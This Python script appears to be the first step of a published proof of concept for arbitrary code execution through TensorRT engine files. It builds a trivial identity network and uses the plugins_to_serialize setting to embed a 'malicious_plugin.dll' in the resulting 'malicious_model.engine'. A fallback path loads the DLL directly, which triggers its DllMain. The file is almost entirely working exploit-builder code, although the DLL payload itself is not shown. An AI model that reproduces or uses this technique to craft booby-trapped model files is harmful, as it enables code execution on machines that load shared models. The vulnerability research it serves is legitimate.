# tensorrt-ace-poc-embedded-plugin / build_malicious_engine.py
# treforbenbow's picture
# Upload build_malicious_engine.py with huggingface_hub
# a86b88f verified
"""
TensorRT ACE PoC - Step 1: Build a malicious .engine file with embedded plugin DLL.
This script:
1. Creates a simple identity network using TensorRT's network API
2. Serializes the malicious plugin DLL into the engine file via plugins_to_serialize
3. Saves the resulting .engine file
The .engine file will contain the embedded DLL that executes arbitrary code
when deserialized by TensorRT.
"""
import os
import sys
import tensorrt as trt
def _create_identity_network(builder):
    """Create an explicit-batch network that passes "input" straight to "output".

    Args:
        builder: the ``trt.Builder`` that owns the new network definition.

    Returns:
        The populated network definition, or ``None`` if
        ``builder.create_network`` returned ``None``.
    """
    network = builder.create_network(
        1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    )
    if network is None:
        return None
    # A trivial graph: one fixed-shape float32 input through an identity layer.
    input_tensor = network.add_input("input", trt.float32, (1, 3, 32, 32))
    identity = network.add_identity(input_tensor)
    output = identity.get_output(0)
    output.name = "output"
    network.mark_output(output)
    return network


def _create_builder_config(builder, plugin_path):
    """Create a builder config with a 1 MiB workspace that lists *plugin_path*.

    The path is placed in ``plugins_to_serialize``, which TensorRT reads from
    disk at build time so the library is packed into the serialized engine.
    """
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 1 << 20)  # 1MB
    config.plugins_to_serialize = [plugin_path]
    return config


def build_malicious_engine():
    """Build an identity-network engine with the plugin DLL embedded and save it.

    Expects ``malicious_plugin.dll`` next to this script. Builds a trivial
    TensorRT engine whose config lists that DLL in ``plugins_to_serialize``
    and writes the result to ``malicious_model.engine`` in the same directory.
    If the first build fails, the DLL is loaded into the builder's plugin
    registry and the build is retried once with a fresh builder.

    Returns:
        bool: ``True`` if the engine file was written, ``False`` on any
        failure (each failure is reported on stdout).
    """
    script_dir = os.path.dirname(__file__)
    plugin_dll = os.path.join(script_dir, "malicious_plugin.dll")
    engine_file = os.path.join(script_dir, "malicious_model.engine")

    if not os.path.exists(plugin_dll):
        print(f"ERROR: Plugin DLL not found: {plugin_dll}")
        return False

    logger = trt.Logger(trt.Logger.VERBOSE)
    builder = trt.Builder(logger)
    if builder is None:
        print("ERROR: Failed to create builder")
        return False

    # NOTE: We skip load_library() - just embed the DLL directly.
    # TensorRT reads the file from disk for plugins_to_serialize.
    dll_size = os.path.getsize(plugin_dll)
    print(f"[*] Plugin DLL: {plugin_dll} ({dll_size} bytes)")

    network = _create_identity_network(builder)
    if network is None:
        print("ERROR: Failed to create network")
        return False
    print("[*] Simple identity network created")

    # KEY STEP: ask the builder to serialize the plugin DLL into the engine.
    print(f"[*] Setting plugins_to_serialize: {plugin_dll}")
    config = _create_builder_config(builder, plugin_dll)

    print("[*] Building engine (this may take a moment)...")
    serialized_engine = builder.build_serialized_network(network, config)

    if serialized_engine is None:
        print("ERROR: Failed to build serialized engine")
        print("[*] Trying approach 2: load_library first, then serialize...")
        # Approach 2: load the library first (this triggers DllMain during build)
        registry = builder.get_plugin_registry()
        handle = registry.load_library(plugin_dll)
        print(f"[*] load_library result: {handle}")

        # Rebuild from scratch with a fresh builder, network and config.
        # The original code never checked these for None, so a failure here
        # surfaced as an AttributeError instead of a clean False return.
        builder2 = trt.Builder(logger)
        if builder2 is None:
            print("ERROR: Failed to create builder for retry")
            return False
        network2 = _create_identity_network(builder2)
        if network2 is None:
            print("ERROR: Failed to create network for retry")
            return False
        config2 = _create_builder_config(builder2, plugin_dll)
        serialized_engine = builder2.build_serialized_network(network2, config2)
        if serialized_engine is None:
            print("ERROR: Still failed to build engine")
            return False

    engine_size = serialized_engine.nbytes
    print(f"[+] Engine built successfully! Size: {engine_size} bytes")

    # Heuristic only: an engine larger than the DLL is consistent with the DLL
    # having been embedded, but it does not prove it.
    print(f"[*] Plugin DLL size: {dll_size} bytes")
    if engine_size > dll_size:
        print("[+] Engine is larger than DLL - DLL likely embedded!")
    else:
        print("[-] Engine seems too small - DLL might not be embedded")

    with open(engine_file, "wb") as f:
        f.write(bytes(serialized_engine))
    print(f"[+] Malicious engine saved to: {engine_file}")
    return True
if __name__ == "__main__":
    # Remove any leftover PWNED.txt next to this script before building, so a
    # file from an earlier run is not mistaken for a new result (presumably
    # the file is produced by a later step — confirm against the loader).
    proof_path = os.path.join(os.path.dirname(__file__), "PWNED.txt")
    if os.path.exists(proof_path):
        os.remove(proof_path)

    ok = build_malicious_engine()
    if not ok:
        print("\n[-] STEP 1 FAILED")
    else:
        print("\n[+] STEP 1 COMPLETE: Malicious engine built.")
        print("[*] Next: Run load_malicious_engine.py to test ACE")

    # Exit status: 0 on success, 1 on failure.
    sys.exit(0 if ok else 1)